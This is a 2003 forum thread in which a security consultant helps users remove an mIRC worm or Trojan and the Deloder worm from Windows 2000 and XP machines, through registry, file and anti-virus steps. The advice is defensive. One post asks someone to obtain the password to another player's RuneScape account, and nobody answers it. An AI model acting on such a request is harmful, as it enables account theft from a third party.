Unable to repair this file.
but later after I performed full scan it showed nothing infected.How can I avoid this in future.
2.I have found inst.exe file in the location,
D:\Winnt\System32\inst.exe and looks like disabled.Can I delete this file ?? Is this not system file ?? if I delete,will there be any problem??
3.When ever I start my OS,I noticed a small MIRC icon is getting displayed on my taskbar as well as on the sceen.From the taskmanager I found 'syscnfg.exe' is performing this.
But when I searched in my drive,I found only one file ie.,dated when I installed MIRC.But by going to Registry at location,
HKey_local_machine//software//microsoft//windows//CurrentVersion//Run
I found 2 entries with 'syscnfg.exe'.One with Microsoft and other with MSCORE.
I doubt second one Trojan,so shall I delete entire entry??
Please reply soon.Thanks in advance.
Kyle Lai
klai@klcconsulting.net
03/19/03
Joe,

I think you probably haven't run the anti-virus and anti-Trojan software with the latest definition; otherwise you should also detect all deloder files and "syscnfg.exe". "syscnfg.exe" is another variant of mIRC worm/Trojan.

As stated in the "removal instruction" and "recommendation for protections" sections in my analysis (http://www.klcconsulting.net/deloder_worm.htm) , follow the steps and you will remove "syscnfg.exe" all together when you run the anti-virus and anti-Trojan, as well as protecting yourself for future attacks.

As to your questions:
1. Follow the steps in my deloder analysis.
2. inst.exe only ran once to expand the files inside it, then it activate the backdoors to run. So, Yes, You should delete inst.exe.
3. Yes, delete the entry, and then run Anti-Trojan/Anti-virus software with the latest definition.

XP systems:
As I have mentioned in my prior messages, If you have XP, disable the "system recovery" mode, do the virus scan, then reboot your system, and re-enable the automatic recovery. The instruction for disabling/enabling system recovery is on the Symantec website:
http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/7e7f15291a25d938882567e50048a048/5065b3834b10031488256b0900255ea7?OpenDocument

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

tom
scorpio232@hotmail.com
03/20/03
can you get a password to the account of a high level player on runescape plz someone just stole my account just send it to my e-mail at scorpio232@hotmail.com
Joe

03/20/03
Dear Kyle,
1.I have updated with latest virus definitions and scanned with NAV.It detected IRC Trojan at this location,
D:\Winnt\Fonts\Font2\msinv.dll and said 'unable to repair'.But I didnt find this dll at that location.
2.I scanned with anti-trojan s/w and it said 'Trojan may infected this file'
D:\Winnt\msapps\dir\shell32.exe
The action I performed is 'Rename the file name'.Is it correct of doing this.Will it effect anything? Other than this file it detected nothing.
3.And I had deleted 'syscnfg.exe' from registry and deleted 'inst.exe'.But still after rebooting I found Mirc icon displaying on the task bar as well on the screen.I wonder how it appeared again.Its same 'syscnfg.exe' performing this.
Kindly advice how to overcome all these things.
Thanks in advance.
Kyle Lai
klai@klcconsulting.net
03/24/03
Joe,
What is the operating system?

/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Joe

03/25/03
Dear Kyle,
Actually I have partition in my system.On C drive I have Win XP Home and on D drive I have Win2000.These things are all happening when I log in to Win2000.
Couple of days back I noticed when I start Win2000 OS,a small dialog is appearing on the screen along with Mirc icon with OK button,'Project 1' as heading and 'File not found 53' and 'Run time error' as message.From task manager I found 'clt.exe' is performing this.It is in this location.
D:\\Winnt\msapps\dir\clt.exe.
Please clear me this point too.
Thanks.
Kyle Lai
klai@klcconsulting.net
03/25/03
Hi Joe,
If you are comfortable looking at the registry, look into the registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
and see if you find any association with "clt.exe".

Also, check "startup" folder in all of the subfolders under "[drive]\documents and settings\" and look at the properties of the shortcuts and see if anyone of them point to "clt.exe". If they do, delete them.

Let us know how it goes.

Cheers,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Joe

03/25/03
Dear Kyle,
Yes,in the registry I found with the name 'MSKCES32' and value D:\\Winnt\msapps\dir\clt.exe.
At this location I noticed the file was created on 12/15/2002.But I am getting this problem since 1 week.Still you advice me to delete it from registry ?? Other than this location I didn't find anywhere.
Thanks.
Matt

03/26/03
Kyle
Like others, welre having problems with the HideMyPornoExe popup window after reboots in Win2K. I did what you suggested and cleaned out the registry, but I'm still seeing popup windows after reboot. Any suggestions?

Thanks.

Kyle Lai
klai@klcconsulting.net
03/27/03
Joe/Matt:

Joe: Yes, deleting it should resolve your problem.

Matt:
Did you run through the 4 programs mentioned in 9/24/2002? If you haven't, please go through them and give us an update.

Cheers,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Joe

03/28/03
Dear Kyle,
After deleting from registry,dialog box problem on bootup is solved.But still Mirc icon is getting displayed on screen as well as on task bar.'syscnfg.exe' is performing this.But I deleted this from registry when I noticed there are 2 values as explained on 03/19/03.Now only one entry with name 'Microsoft Value' with value 'D:\Winnt\Fonts\Font2\syscnfg.exe' is existing in registry.Please advice.
Thanks.
Joe

03/28/03
Hey Kyle,
In the registry,
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
I found variant 'RunDLL34'with value 'D:\Winnt\Fonts\Font2\syscnfg.exe'.I think this only performing the Mirc Icon on boot up,shall I delete it ??
Kyle Lai
klai@klcconsulting.net
03/29/03
Hi Joe,

Yes, delete that registry value should help. Can you please rename the file syscnfg.exe to syscnfg.txt and zip that file and send it to me at kyle@kylelai.com?

Also, use Windows explorer and goto d:\winnt\fonts\ directory and use the search function by right clicking on the "fonts" directory and select "search", do a search of *.* in this directory, you should see the "font2" directory. Delete this directory should remove the virus completely.

Good luck,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Joe

03/30/03
Hi Kyle,
I have deleted from registry and deleted 'Font2' folder too.On booting I didn't find Mirc Icon but I found messages saying 'cannot find syscnfg.exe file make sure path is correct..libraries not available' and 'could not load or run syscnfg.exe.Make sure the file exists in computer or remove reference to the registry'.
In the registry in various locations I found syscnfg.exe.For ex:
HKEY_USERS\S-1-5-21-57989841-1078145449-1957994488-1002\Software\Microsoft\WindowsNT\CurrentVersion\Windows.At this location with name 'run' value 'D:\Winnt\Fonts\Font2\syscnfg.exe'.
And HKEY_CurrentUser\Software\Microsoft\InternetExplorer\Explorer Bars\..\FilenamesMRU.
Here with name '000' value 'syscnfg.exe'.
So,suggest me a solution to get rid of this.
Dan
daniel10@ireland.com
04/01/03
sscfbtn
Please Help,

My computer is constantly freezing and when I press C + A + D I get the message sscfbtn (not responding) or Spool32(not responding) I press end task and get the dreaded blue screen. I have to swittch off then on again every time.
Can anyboby help me?

Kyle Lai
klai@klcconsulting.net
04/10/03
Dan,
Not sure if that's related to Trojans or viruses, but try to use the anti-virus and anti-Trojan software from the 9/24/2002 and see if you can find anything.

If not, then try to defrag your hard drive... maybe that will help a bit.

If not, then there might be some conflicts between softwares, might be on some dll's... If it seriously irritate you, then you might want to re-install the OS.

Good luck,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Kyle Lai
klai@klcconsulting.net
04/13/03
There are increasing port 445 activities, and these are most likely the IRC related worms and Trojans. (http://www.incidents.org)

ocxdll.exe, Deloder worms, and several other IRC worm variants are getting worse, and sadly, it is a trend for the virus writers because it's effective, and many home users still leave their computers unsecured. Many new worms and Trojans come with password list. The password list for guessing administrator accounts are growing, which means if you have weak passwords, these worms will most likely get into your systems. A sample of these passwords can be found in http://www.klcconsulting.net/mirc_virus_analysis.htm and http://www.klcconsulting.net/deloder_worm.htm

Be certain to secure your systems with anti-virus, Anti-Trojans, and firewalls. The posting from 9/24 have links to free utilities that you can use to secure your systems. By securing your system, you can prevent many viruses, worms and Trojans from entering your systems.

Best luck to all,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net



© Copyright 1998-2004 Newbie dot Org -- All rights reserved --



This site maintained by Galaxy Website Design


--|--